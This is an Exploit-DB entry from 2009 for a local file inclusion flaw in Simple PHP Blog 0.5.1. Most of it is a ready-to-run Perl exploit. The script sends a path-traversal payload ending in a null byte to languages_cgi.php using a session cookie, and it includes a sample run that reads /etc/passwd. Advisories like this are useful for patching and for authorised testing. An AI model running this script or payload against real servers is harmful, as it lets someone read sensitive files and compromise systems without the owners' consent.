Simple PHP Blog 0.5.1 - Local File Inclusion

EDB-ID:

10604

Author:

jgaliana

Type:

webapps

Platform:

PHP

Published:

2009-12-22

# Simple PHP Blog is prone to a local file-include vulnerability because it fails to properly
# sanitize user-supplied input.

#An attacker can exploit this vulnerability to obtain potentially sensitive information or to #execute arbitrary local scripts in the context of the webserver process. This may allow the #attacker to compromise the application and the underlying computer; other attacks are also #possible.

# Simple PHP Blog 0.5.1 is vulnerable; other versions may also be affected. 

#!/usr/bin/perl
# Local File Include Exploit
# Simple PHP Blog <= 0.5.1
# jgaliana <at> isecauditors=dot=com
# Internet Security Auditors

use LWP::UserAgent;

if ($#ARGV < 3) { die("Usage: $0 <site> <path> <file> <cookie>"); }
$ua = LWP::UserAgent->new;
$ua->agent("Simple PHP Blog Exploit ^_^");
$ua->default_header('Cookie' => "sid=$ARGV[3]");
my $req = new HTTP::Request POST =>
"http://$ARGV[0]$ARGV[1]/languages_cgi.php";
$req->content_type('application/x-www-form-urlencoded');
$req->content("blog_language1=../../../../..$ARGV[2]%00");
my $res = $ua->request($req);

if ($res->is_success) {
    print $res->content;
} else {
    print "Error: " .$res->status_line, "\n";
}

#$ perl simple.pl example.com /blog /etc/passwd <my_cookie_here>|head -1
#root:*:0:0:root:/root:/bin/bash